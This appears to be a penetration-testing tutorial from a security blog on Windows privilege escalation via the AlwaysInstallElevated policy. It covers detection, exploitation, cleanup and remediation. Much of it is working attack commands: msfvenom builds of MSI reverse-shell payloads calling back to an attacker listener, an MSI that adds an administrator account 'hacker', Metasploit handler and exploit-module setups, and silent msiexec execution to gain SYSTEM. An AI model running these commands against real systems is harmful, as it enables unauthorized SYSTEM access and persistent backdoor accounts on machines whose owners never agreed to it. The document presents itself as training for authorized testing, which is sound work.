Windows Privilege Escalation via AlwaysInstallElevated Technique

AlwaysInstallElevated is a Windows group policy setting that allows non-privileged users to install MSI packages with elevated (SYSTEM) privileges. When enabled, it is one of the easiest and most reliable Windows privilege escalation vectors you will encounter. This tutorial covers detection, exploitation, and the underlying mechanics.

What Is AlwaysInstallElevated?

Windows Installer (msiexec.exe) normally installs MSI packages with the privileges of the user running the installation. The AlwaysInstallElevated policy overrides this behavior, telling the Windows Installer to use elevated privileges for all installations regardless of who initiates them.

This setting exists because some organizations need regular users to install specific software without granting them admin access. The problem is that the setting applies to all MSI packages, not just approved ones. Any user can create a malicious MSI and have it executed with SYSTEM privileges.

For this to be exploitable, the setting must be enabled in both the local machine and current user registry hives. Both keys must be set to 1.

Detecting the Misconfiguration

Manual Registry Query

Check both registry keys:

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both return AlwaysInstallElevated REG_DWORD 0x1, the system is vulnerable.

If either key does not exist or is set to 0, this technique will not work.

Using PowerUp.ps1

PowerUp from PowerSploit checks for this automatically:

. .\PowerUp.ps1
Get-RegistryAlwaysInstallElevated

If vulnerable, it will return True for both the HKLM and HKCU checks.

Using winPEAS

The Windows privilege escalation enumeration script winPEAS also checks for this:

winPEASx64.exe quiet windowscreds

Look for the AlwaysInstallElevated section in the output. It will be highlighted if the keys are enabled.

Using Metasploit

If you have a Meterpreter session, the local exploit suggester will flag this:

meterpreter > run post/multi/recon/local_exploit_suggester

Or check specifically:

meterpreter > run post/windows/gather/enum_always_install_elevated

Creating a Malicious MSI with msfvenom

Once you have confirmed the vulnerability, create a malicious MSI package using msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o malicious.msi

For a Meterpreter session:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o malicious.msi

You can also create an MSI that adds a local administrator account:

msfvenom -p windows/adduser USER=hacker PASS=Password123! -f msi -o adduser.msi

Setting Up the Listener

Start your listener before executing the MSI:

use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
run

Exploitation

Transfer the malicious MSI to the target system and execute it.

Silent Installation (Preferred)

Run the MSI silently to avoid any installation dialogs:

msiexec /quiet /qn /i C:\Temp\malicious.msi

The flags:

  • /quiet - suppresses all user interface
  • /qn - no UI at all (not even a progress bar)
  • /i - install mode

Because AlwaysInstallElevated is enabled, msiexec runs the installation with SYSTEM privileges even though your user is unprivileged. Your reverse shell connects back with SYSTEM access.

Using PowerUp

PowerUp can handle the exploitation automatically:

Write-UserAddMSI

This creates UserAdd.msi in the current directory. When executed, it adds a new local administrator. Then install it:

msiexec /quiet /qn /i UserAdd.msi

Using Metasploit Module

Metasploit has a dedicated module for this:

use exploit/windows/local/always_install_elevated
set SESSION 1
set LHOST 10.10.14.5
set LPORT 5555
run

This automatically generates and executes the MSI through your existing session.

Verifying Success

After exploitation, verify your privileges:

whoami

You should see NT AUTHORITY\SYSTEM. If you used the adduser payload instead:

net user hacker
net localgroup administrators

Confirm the new user exists and is in the administrators group.

Understanding Why This Works

The Windows Installer service (msiserver) runs as SYSTEM. When AlwaysInstallElevated is enabled, the installer service processes MSI packages at SYSTEM privilege level for all users. The MSI file format supports custom actions, which are essentially arbitrary code execution hooks that run during installation. Msfvenom creates an MSI with a custom action containing your payload, which the installer service executes as SYSTEM.

Cleanup

After the engagement, clean up your artifacts:

del C:\Temp\malicious.msi

If you created a user:

net user hacker /delete

Document everything you changed for the client report.

Defensive Recommendations

If you find this misconfiguration during an engagement, here are the remediation steps to include in your report:

Disable the policy: Set both registry keys to 0 or delete them:

reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f
reg delete HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f

Or through Group Policy Editor: Computer Configuration > Administrative Templates > Windows Components > Windows Installer > "Always install with elevated privileges" - set to Disabled.

Use AppLocker: Restrict which MSI packages can be installed based on publisher, path, or file hash.

Application whitelisting: Tools like Windows Defender Application Control (WDAC) can prevent unauthorized MSI execution.

Monitor MSI installations: Enable Windows Installer logging and monitor for unexpected MSI executions, especially silent installations.

Summary

AlwaysInstallElevated is a low-hanging fruit that you should check for on every Windows engagement. The detection is simple (two registry queries), the exploitation is reliable (msfvenom MSI), and the result is SYSTEM access. Add this to your standard enumeration checklist and you will be surprised how often it shows up in enterprise environments.

HP
The HnP Team
Offensive Security Researchers
HacknPentest is a collective of penetration testers and bug bounty hunters sharing practical offensive security knowledge. Combined experience includes corporate red team engagements, bug bounty programs on HackerOne and Bugcrowd, and OSCP/OSCE certifications. All techniques demonstrated are for authorized testing and educational purposes only.